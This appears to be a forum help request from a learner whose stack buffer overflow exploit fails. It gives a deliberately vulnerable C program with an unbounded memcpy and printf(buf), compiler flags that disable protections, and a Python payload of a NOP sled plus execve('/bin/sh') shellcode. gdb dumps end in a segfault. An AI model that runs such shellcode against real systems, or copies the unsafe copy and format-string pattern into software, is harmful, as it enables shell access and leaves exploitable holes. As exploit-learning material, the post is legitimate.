I am trying to execute the shellcode to spawn an "sh" shell. I have taken shellcode as command line arguement,copied it to stack and tried to overwrite the return address of main function with the starting address of shellcode placed in stack. Everything goes fine but when the program executes "ret" statement,mysteriously the control jumps to other location rather than starting address of shellcode and shellcode doesnot execute
Here is my code ,compilation and "gdb" details
#include<stdio.h>
int main(int argc, char *argv[])
{
char buf[256];
memcpy(buf, argv[1],strlen(argv[1]));
printf(buf);
}
compilation: gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o shellcode shellcode.c -w
gdb Details:::r python -c 'print "A"*232+"\x31\xc0\x50\x68\x2f\x2f\x73\x68x0b\xcd\x80\x31\xc0\x40\xcd\x80"+"\xe8\xf3\xff\xbf"'
In gdb,I see that gcc is allocating 268 bytes of space for local use inside main function.
output details::::
(gdb) r python -c 'print "\x90"*232+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"+"\xe8\xf3\xff\xbf"'
(gdb) r python -c 'print "\x90"*232+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"+"\xe8\xf3\xff\xbf"'
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/HIIII/bflw_pres/shellcode python -c 'print "\x90"*232+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"+"\xe8\xf3\xff\xbf"'
Breakpoint 1, 0x080484af in main () (gdb) x/70xw $esp 0xbffff3dc: 0xbffff3e8 0xbffff6f3 0x00000108 0x00000001 0xbffff3ec: 0x000008d3 0xb7fdcb48 0xb7fdc858 0x0804826b 0xbffff3fc: 0xb7e1b438 0x0804821c 0x00000001 0x00000000 0xbffff40c: 0x00000000 0x00000000 0xb7fff000 0xbffff524 0xbffff41c: 0xb7fffaf0 0xbffff4e0 0xb7fe77aa 0xbffff490 0xbffff42c: 0x0804821c 0xbffff498 0xb7fffa94 0x00000000 0xbffff43c: 0xb7fdcb48 0x00000001 0x00000000 0x00000001 0xbffff44c: 0xb7fff938 0x00000000 0x00000000 0x00000000 0xbffff45c: 0x00000000 0x00000003 0x00000009 0x02c0003f 0xbffff46c: 0x00000000 0xbffff524 0xbffff498 0xbffff490 0xbffff47c: 0x0804826b 0xb7fff938 0x00000000 0x000000c2 0xbffff48c: 0xb7ea3d56 0xffffffff 0xbffff4be 0xb7e1abf8 0xbffff49c: 0xb7e41493 0x00000000 0x00ca0000 0x00000001 0xbffff4ac: 0x080482fd 0xbffff6d3 0x0000002f 0x0804a000 0xbffff4bc: 0x08048522 0x00000002 0xbffff584 0xbffff590 0xbffff4cc: 0xb7e4164d 0xb7fb93c4 0xb7fff000 0x080484db 0xbffff4dc: 0xb7fb9000 0x080484d0 0x00000000 0x00000000 0xbffff4ec: 0xb7e27a83 0x00000002
(gdb) c
Continuing.
Breakpoint 2, 0x080484b4 in main () (gdb) x/70xw $esp 0xbffff3dc: 0xbffff3e8 0xbffff6f3 0x00000108 0x90909090 0xbffff3ec: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff3fc: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff40c: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff41c: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff42c: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff43c: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff44c: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff45c: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff46c: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff47c: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff48c: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff49c: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff4ac: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff4bc: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff4cc: 0x90909090 0x6850c031 0x68732f2f 0x69622f68 0xbffff4dc: 0x89e3896e 0xb0c289c1 0x3180cd0b 0x80cd40c0 0xbffff4ec: 0xbffff3e8 0x00000002
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault. 0xbffff4e5 in ?? ()
(gdb)
Pls..help
